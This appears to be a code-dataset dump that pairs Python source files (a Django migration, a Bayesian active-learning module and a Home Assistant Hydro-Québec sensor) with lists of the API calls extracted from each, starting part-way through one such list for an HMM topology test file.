] | [((261, 281), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (275, 281), True, 'import pytest, warnings, numpy as np\n'), ((288, 315), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (309, 315), True, 'import pytest, warnings, numpy as np\n'), ((594, 633), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (603, 633), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((888, 927), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (897, 927), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1186, 1225), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (1195, 1225), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1593, 1632), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (1602, 1632), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1882, 1921), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (1891, 1921), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((2191, 2230), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (2200, 2230), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((2763, 2811), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (2781, 2811), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((3099, 3147), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (3117, 3147), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((3461, 3509), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (3479, 3509), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4202, 4250), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (4220, 4250), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4535, 4583), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (4553, 4583), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4922, 4970), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (4940, 4970), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((5720, 5768), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (5738, 5768), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((6152, 6200), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (6170, 6200), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((6561, 6607), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (6577, 6607), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((6889, 6935), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (6905, 6935), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((7243, 7289), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (7259, 7289), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((7859, 7905), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (7875, 7905), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((8184, 8230), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (8200, 8230), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((8563, 8609), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (8579, 8609), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9347, 9393), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9363, 9393), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9685, 9731), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9701, 9731), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10148, 10193), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (10163, 10193), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10473, 10518), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (10488, 10518), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10824, 10869), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (10839, 10869), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((11434, 11479), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (11449, 11479), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((11756, 11801), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (11771, 11801), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12132, 12177), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12147, 12177), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12910, 12955), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12925, 12955), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((13331, 13376), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (13346, 13376), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((734, 749), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (742, 749), True, 'import pytest, warnings, numpy as np\n'), ((1028, 1048), 'numpy.array', 'np.array', (['[0.5, 0.5]'], {}), '([0.5, 0.5])\n', (1036, 1048), True, 'import pytest, warnings, numpy as np\n'), ((1326, 1361), 'numpy.array', 'np.array', (['[0.2, 0.2, 0.2, 0.2, 0.2]'], {}), '([0.2, 0.2, 0.2, 0.2, 0.2])\n', (1334, 1361), True, 'import pytest, warnings, numpy as np\n'), ((1732, 1747), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (1740, 1747), True, 'import pytest, warnings, numpy as np\n'), ((2021, 2055), 'numpy.array', 'np.array', (['[0.57633871, 0.42366129]'], {}), '([0.57633871, 0.42366129])\n', (2029, 2055), True, 'import pytest, warnings, numpy as np\n'), ((2330, 2400), 'numpy.array', 'np.array', (['[0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898]'], {}), '([0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898])\n', (2338, 2400), True, 'import pytest, warnings, numpy as np\n'), ((2928, 2945), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (2936, 2945), True, 'import pytest, warnings, numpy as np\n'), ((3264, 3298), 'numpy.array', 'np.array', (['[[0.5, 0.5], [0.0, 1.0]]'], {}), '([[0.5, 0.5], [0.0, 1.0]])\n', (3272, 3298), True, 'import pytest, warnings, numpy as np\n'), ((3626, 3806), 'numpy.array', 'np.array', (['[[0.2, 0.2, 0.2, 0.2, 0.2], [0.0, 0.25, 0.25, 0.25, 0.25], [0.0, 0.0, \n 0.33333333, 0.33333333, 0.33333333], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, \n 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.2, 0.2, 0.2, 0.2, 0.2], [0.0, 0.25, 0.25, 0.25, 0.25], [0.0, \n 0.0, 0.33333333, 0.33333333, 0.33333333], [0.0, 0.0, 0.0, 0.5, 0.5], [\n 0.0, 0.0, 0.0, 0.0, 1.0]])\n', (3634, 3806), True, 'import pytest, warnings, numpy as np\n'), ((4366, 4383), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (4374, 4383), True, 'import pytest, warnings, numpy as np\n'), ((4699, 4747), 'numpy.array', 'np.array', (['[[0.23561633, 0.76438367], [0.0, 1.0]]'], {}), '([[0.23561633, 0.76438367], [0.0, 1.0]])\n', (4707, 4747), True, 'import pytest, warnings, numpy as np\n'), ((5086, 5340), 'numpy.array', 'np.array', (['[[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782], [0.0, \n 0.19474072, 0.16405008, 0.22228532, 0.41892388], [0.0, 0.0, 0.42912755,\n 0.16545797, 0.40541448], [0.0, 0.0, 0.0, 0.109713, 0.890287], [0.0, 0.0,\n 0.0, 0.0, 1.0]]'], {}), '([[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782], [\n 0.0, 0.19474072, 0.16405008, 0.22228532, 0.41892388], [0.0, 0.0, \n 0.42912755, 0.16545797, 0.40541448], [0.0, 0.0, 0.0, 0.109713, 0.890287\n ], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (5094, 5340), True, 'import pytest, warnings, numpy as np\n'), ((5864, 5889), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5877, 5889), False, 'import pytest, warnings, numpy as np\n'), ((6724, 6741), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (6732, 6741), True, 'import pytest, warnings, numpy as np\n'), ((7052, 7086), 'numpy.array', 'np.array', (['[[0.5, 0.5], [0.5, 0.5]]'], {}), '([[0.5, 0.5], [0.5, 0.5]])\n', (7060, 7086), True, 'import pytest, warnings, numpy as np\n'), ((7406, 7556), 'numpy.array', 'np.array', (['[[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2,\n 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2]]'], {}), '([[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, \n 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2]])\n', (7414, 7556), True, 'import pytest, warnings, numpy as np\n'), ((8021, 8038), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (8029, 8038), True, 'import pytest, warnings, numpy as np\n'), ((8346, 8406), 'numpy.array', 'np.array', (['[[0.9474011, 0.0525989], [0.85567599, 0.14432401]]'], {}), '([[0.9474011, 0.0525989], [0.85567599, 0.14432401]])\n', (8354, 8406), True, 'import pytest, warnings, numpy as np\n'), ((8725, 9063), 'numpy.array', 'np.array', (['[[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205], [0.0840705, \n 0.23055049, 0.08297536, 0.25124688, 0.35115677], [0.02117615, \n 0.37664662, 0.26705912, 0.09851123, 0.23660688], [0.01938041, \n 0.16853843, 0.52046123, 0.07535256, 0.21626737], [0.04996846, \n 0.44545843, 0.12079423, 0.07154241, 0.31223646]]'], {}), '([[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205], [\n 0.0840705, 0.23055049, 0.08297536, 0.25124688, 0.35115677], [0.02117615,\n 0.37664662, 0.26705912, 0.09851123, 0.23660688], [0.01938041, \n 0.16853843, 0.52046123, 0.07535256, 0.21626737], [0.04996846, \n 0.44545843, 0.12079423, 0.07154241, 0.31223646]])\n', (8733, 9063), True, 'import pytest, warnings, numpy as np\n'), ((9491, 9516), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9503, 9516), False, 'import pytest, warnings, numpy as np\n'), ((10310, 10327), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (10318, 10327), True, 'import pytest, warnings, numpy as np\n'), ((10635, 10669), 'numpy.array', 'np.array', (['[[0.5, 0.5], [0.0, 1.0]]'], {}), '([[0.5, 0.5], [0.0, 1.0]])\n', (10643, 10669), True, 'import pytest, warnings, numpy as np\n'), ((10986, 11136), 'numpy.array', 'np.array', (['[[0.5, 0.5, 0.0, 0.0, 0.0], [0.0, 0.5, 0.5, 0.0, 0.0], [0.0, 0.0, 0.5, 0.5,\n 0.0], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.5, 0.5, 0.0, 0.0, 0.0], [0.0, 0.5, 0.5, 0.0, 0.0], [0.0, 0.0, \n 0.5, 0.5, 0.0], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (10994, 11136), True, 'import pytest, warnings, numpy as np\n'), ((11595, 11612), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (11603, 11612), True, 'import pytest, warnings, numpy as np\n'), ((11917, 11965), 'numpy.array', 'np.array', (['[[0.65157396, 0.34842604], [0.0, 1.0]]'], {}), '([[0.65157396, 0.34842604], [0.0, 1.0]])\n', (11925, 11965), True, 'import pytest, warnings, numpy as np\n'), ((12293, 12504), 'numpy.array', 'np.array', (['[[0.44455421, 0.55544579, 0.0, 0.0, 0.0], [0.0, 0.57553614, 0.42446386, 0.0,\n 0.0], [0.0, 0.0, 0.92014965, 0.07985035, 0.0], [0.0, 0.0, 0.0, \n 0.66790982, 0.33209018], [0.0, 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.44455421, 0.55544579, 0.0, 0.0, 0.0], [0.0, 0.57553614, \n 0.42446386, 0.0, 0.0], [0.0, 0.0, 0.92014965, 0.07985035, 0.0], [0.0, \n 0.0, 0.0, 0.66790982, 0.33209018], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (12301, 12504), True, 'import pytest, warnings, numpy as np\n'), ((13051, 13076), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (13064, 13076), False, 'import pytest, warnings, numpy as np\n'), ((5787, 5833), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (5803, 5833), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9412, 9460), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9430, 9460), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12974, 13020), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12990, 13020), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n')] |
# Generated by Django 2.2 on 2019-10-10 19:55
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funilaria', '0008_auto_20191009_0904'),
]
operations = [
migrations.AddField(
model_name='orcamento',
name='finalizado',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='ordemdeservico',
name='prazo_entrega',
field=models.DateField(default=datetime.datetime(2019, 10, 10, 16, 55, 5, 539559)),
),
]
| [
"datetime.datetime",
"django.db.models.BooleanField"
] | [((357, 391), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (376, 391), False, 'from django.db import migrations, models\n'), ((553, 603), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(10)', '(10)', '(16)', '(55)', '(5)', '(539559)'], {}), '(2019, 10, 10, 16, 55, 5, 539559)\n', (570, 603), False, 'import datetime\n')] |
# https://arxiv.org/pdf/1703.02910.pdf, Deep Bayesian Active Learning with Image Data
import numpy as np
from .baseline import Strategy
from ..helpers.time import timeit
class BayesianActiveLearning(Strategy):
def __init__(self, nb_forward=10, **kwargs):
super(BayesianActiveLearning, self).__init__()
self.nb_forward = nb_forward
@timeit
def evaluate_dataset(self, dataset, learner, log_time={}):
return np.stack([learner.inference(dataset, bayesian=True)['class_probabilities'] for _ in range(self.nb_forward)])
@timeit
def score_dataset(self, dataset, learner, log_time={}):
raise NotImplementedError
def return_top_indices(self, dataset, learner, top, log_time={}):
scores = self.score_dataset(dataset, learner, log_time=log_time)
sorted_idx = np.argsort(scores)
return sorted_idx[-top:]
class BayesianKLDivergence(BayesianActiveLearning):
@timeit
def score_dataset(self, dataset, learner, log_time={}):
stacked_probabilities = self.evaluate_dataset(
dataset, learner, log_time=log_time)
C, N, _ = stacked_probabilities.shape
consensus_probabilities = np.mean(stacked_probabilities, axis=0)
divergences = np.zeros((N, C))
for i in range(N):
for c in range(C):
probabilities_ic = stacked_probabilities[c, i]
probabilities_i = consensus_probabilities[i]
divergences[i, c] = np.sum(
probabilities_ic * np.log(probabilities_ic/probabilities_i))
return np.mean(divergences, axis=1)
class BayesianEntropyStrategy(BayesianActiveLearning):
@timeit
def score_dataset(self, dataset, learner, log_time={}):
stacked_probabilities = self.evaluate_dataset(
dataset, learner, log_time=log_time)
probabilities = np.mean(stacked_probabilities, axis=0)
assert len(probabilities) == len(dataset)
entropies = -np.sum(probabilities * np.log(probabilities), axis=1)
return entropies
class BayesianBALDStrategy(BayesianActiveLearning):
@timeit
def score_dataset(self, dataset, learner, log_time={}):
inference_result = learner.inference(dataset)
model_probabilities = inference_result['class_probabilities']
model_entropies = - \
np.sum(model_probabilities * np.log(model_probabilities), axis=1)
stacked_probabilities = self.evaluate_dataset(
dataset, learner, log_time=log_time)
average_entropies = - np.mean(
np.sum(stacked_probabilities * np.log(stacked_probabilities), axis=2), axis=0)
return model_entropies - average_entropies
| [
"numpy.argsort",
"numpy.mean",
"numpy.zeros",
"numpy.log"
] | [((828, 846), 'numpy.argsort', 'np.argsort', (['scores'], {}), '(scores)\n', (838, 846), True, 'import numpy as np\n'), ((1190, 1228), 'numpy.mean', 'np.mean', (['stacked_probabilities'], {'axis': '(0)'}), '(stacked_probabilities, axis=0)\n', (1197, 1228), True, 'import numpy as np\n'), ((1251, 1267), 'numpy.zeros', 'np.zeros', (['(N, C)'], {}), '((N, C))\n', (1259, 1267), True, 'import numpy as np\n'), ((1590, 1618), 'numpy.mean', 'np.mean', (['divergences'], {'axis': '(1)'}), '(divergences, axis=1)\n', (1597, 1618), True, 'import numpy as np\n'), ((1876, 1914), 'numpy.mean', 'np.mean', (['stacked_probabilities'], {'axis': '(0)'}), '(stacked_probabilities, axis=0)\n', (1883, 1914), True, 'import numpy as np\n'), ((2009, 2030), 'numpy.log', 'np.log', (['probabilities'], {}), '(probabilities)\n', (2015, 2030), True, 'import numpy as np\n'), ((2386, 2413), 'numpy.log', 'np.log', (['model_probabilities'], {}), '(model_probabilities)\n', (2392, 2413), True, 'import numpy as np\n'), ((1533, 1575), 'numpy.log', 'np.log', (['(probabilities_ic / probabilities_i)'], {}), '(probabilities_ic / probabilities_i)\n', (1539, 1575), True, 'import numpy as np\n'), ((2609, 2638), 'numpy.log', 'np.log', (['stacked_probabilities'], {}), '(stacked_probabilities)\n', (2615, 2638), True, 'import numpy as np\n')] |
import logging
import asyncio
import json
from datetime import datetime, timedelta
from dateutil import tz, relativedelta
from pyhydroquebec.error import PyHydroQuebecHTTPError
from pyhydroquebec.client import HydroQuebecClient
from pyhydroquebec.consts import (
CURRENT_MAP,
DAILY_MAP,
)
import voluptuous as vol
from homeassistant.exceptions import PlatformNotReady
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_USERNAME,
CONF_PASSWORD,
ENERGY_KILO_WATT_HOUR,
CONF_NAME,
CONF_MONITORED_VARIABLES,
TEMP_CELSIUS,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
REQUESTS_TIMEOUT = 15
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=6)
SCAN_INTERVAL = timedelta(hours=6)
CONF_CONTRACT = "contract"
CONF_NAME = "name"
CONF_MONITORED_VARIABLES = "monitored_variables"
KILOWATT_HOUR = ENERGY_KILO_WATT_HOUR
SENSOR_TYPES = {**CURRENT_MAP, **DAILY_MAP}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_CONTRACT): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_MONITORED_VARIABLES, default=[]): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the HydroQuebec sensor."""
# Create a data fetcher to support all of the configured sensors. Then make
# the first call to init the data.
_LOGGER.debug("Création du client")
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
contract = config.get(CONF_CONTRACT)
monitored_variables = config.get(CONF_MONITORED_VARIABLES)
time_zone = str(hass.config.time_zone)
httpsession = async_get_clientsession(hass, False)
hqdata = HydroQuebecData(
username, password, contract, time_zone, REQUESTS_TIMEOUT, httpsession # , 'DEBUG'
)
await hqdata.async_update()
sensors = []
for sensor_type in monitored_variables:
sensors.append(HydroQuebecSensor(hqdata, sensor_type))
async_add_entities(sensors, True)
return True
class HydroQuebecSensor(Entity):
"""Implementation of a HydroQuebec sensor."""
def __init__(self, hqdata, sensor_type):
"""Initialize the sensor."""
self.type = sensor_type
self._client_name = "hydroquebec"
self._name = SENSOR_TYPES[sensor_type]["raw_name"]
self._unit_of_measurement = SENSOR_TYPES[sensor_type]["unit"]
self._icon = SENSOR_TYPES[sensor_type]["icon"]
self._device_class = SENSOR_TYPES[sensor_type]["device_class"]
self.hqdata = hqdata
self._state = None
self._unique_id = f"{sensor_type}_{self._name}"
_LOGGER.debug(f"init sensor {sensor_type}")
@property
def name(self):
"""Return the name of the sensor."""
return f"{self._name}"
@property
def state(self):
"""Return the state of the sensor."""
if self.type[0:5] == "perio":
if self.hqdata.period != {}:
return "{:.2f}".format(self.hqdata.period[self.type])
else:
return None
else:
if self.hqdata.daily != {}:
return "{:.2f}".format(self.hqdata.daily[self.type])
else:
return None
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self._icon
@property
def device_class(self):
"""Home-Assistant device class"""
return self._device_class
@property
def unique_id(self):
return self._unique_id
async def async_update(self):
"""Get the latest data from Hydroquebec and update the state."""
await self.hqdata.async_update()
# _LOGGER.debug(self._hqdata.period)
class HydroQuebecData:
"""Implementation of a HydroQuebec DataConnector."""
def __init__(self, username, password, contract, time_zone, REQUESTS_TIMEOUT, httpsession):
self._contract = contract
self._hqclient = HydroQuebecClient(
username, password, REQUESTS_TIMEOUT, httpsession # , 'DEBUG'
)
self._daily = {}
self._period = {}
self._tz = tz.gettz(time_zone)
@property
def daily(self):
return self._daily
@property
def period(self):
return self._period
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self):
"""Get the latest data from Hydroquebec and update the state."""
await self._hqclient.login()
for customer in self._hqclient.customers:
if customer.contract_id != self._contract and self._contract is not None:
continue
if self._contract is None:
_LOGGER.warning(
"Contract id not specified, using first available.")
try:
yesterday = datetime.now(self._tz) - timedelta(hours=27)
yesterday_str = yesterday.strftime("%Y-%m-%d")
_LOGGER.debug(f"Fetching: {yesterday_str}")
await customer.fetch_daily_data(yesterday_str, yesterday_str)
await customer.fetch_current_period()
curr = customer.current_daily_data
#yesterday_date = list(curr.keys())[0]
self._daily = curr[yesterday_str]
period = customer.current_period
self._period = period
except Exception as e:
_LOGGER.warning(f"Exception: {e}")
return
| [
"logging.getLogger",
"voluptuous.Required",
"dateutil.tz.gettz",
"homeassistant.util.Throttle",
"datetime.datetime.now",
"pyhydroquebec.client.HydroQuebecClient",
"voluptuous.In",
"datetime.timedelta",
"voluptuous.Optional",
"homeassistant.helpers.aiohttp_client.async_get_clientsession"
] | [((830, 857), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (847, 857), False, 'import logging\n'), ((908, 926), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (917, 926), False, 'from datetime import datetime, timedelta\n'), ((943, 961), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (952, 961), False, 'from datetime import datetime, timedelta\n'), ((2083, 2119), 'homeassistant.helpers.aiohttp_client.async_get_clientsession', 'async_get_clientsession', (['hass', '(False)'], {}), '(hass, False)\n', (2106, 2119), False, 'from homeassistant.helpers.aiohttp_client import async_get_clientsession\n'), ((4905, 4939), 'homeassistant.util.Throttle', 'Throttle', (['MIN_TIME_BETWEEN_UPDATES'], {}), '(MIN_TIME_BETWEEN_UPDATES)\n', (4913, 4939), False, 'from homeassistant.util import Throttle\n'), ((1198, 1225), 'voluptuous.Required', 'vol.Required', (['CONF_USERNAME'], {}), '(CONF_USERNAME)\n', (1210, 1225), True, 'import voluptuous as vol\n'), ((1246, 1273), 'voluptuous.Required', 'vol.Required', (['CONF_PASSWORD'], {}), '(CONF_PASSWORD)\n', (1258, 1273), True, 'import voluptuous as vol\n'), ((1294, 1321), 'voluptuous.Required', 'vol.Required', (['CONF_CONTRACT'], {}), '(CONF_CONTRACT)\n', (1306, 1321), True, 'import voluptuous as vol\n'), ((1342, 1365), 'voluptuous.Optional', 'vol.Optional', (['CONF_NAME'], {}), '(CONF_NAME)\n', (1354, 1365), True, 'import voluptuous as vol\n'), ((1386, 1436), 'voluptuous.Optional', 'vol.Optional', (['CONF_MONITORED_VARIABLES'], {'default': '[]'}), '(CONF_MONITORED_VARIABLES, default=[])\n', (1398, 1436), True, 'import voluptuous as vol\n'), ((4577, 4645), 'pyhydroquebec.client.HydroQuebecClient', 'HydroQuebecClient', (['username', 'password', 'REQUESTS_TIMEOUT', 'httpsession'], {}), '(username, password, REQUESTS_TIMEOUT, httpsession)\n', (4594, 4645), False, 'from pyhydroquebec.client import HydroQuebecClient\n'), ((4751, 4770), 'dateutil.tz.gettz', 'tz.gettz', (['time_zone'], {}), '(time_zone)\n', (4759, 4770), False, 'from dateutil import tz, relativedelta\n'), ((1476, 1496), 'voluptuous.In', 'vol.In', (['SENSOR_TYPES'], {}), '(SENSOR_TYPES)\n', (1482, 1496), True, 'import voluptuous as vol\n'), ((5438, 5460), 'datetime.datetime.now', 'datetime.now', (['self._tz'], {}), '(self._tz)\n', (5450, 5460), False, 'from datetime import datetime, timedelta\n'), ((5463, 5482), 'datetime.timedelta', 'timedelta', ([], {'hours': '(27)'}), '(hours=27)\n', (5472, 5482), False, 'from 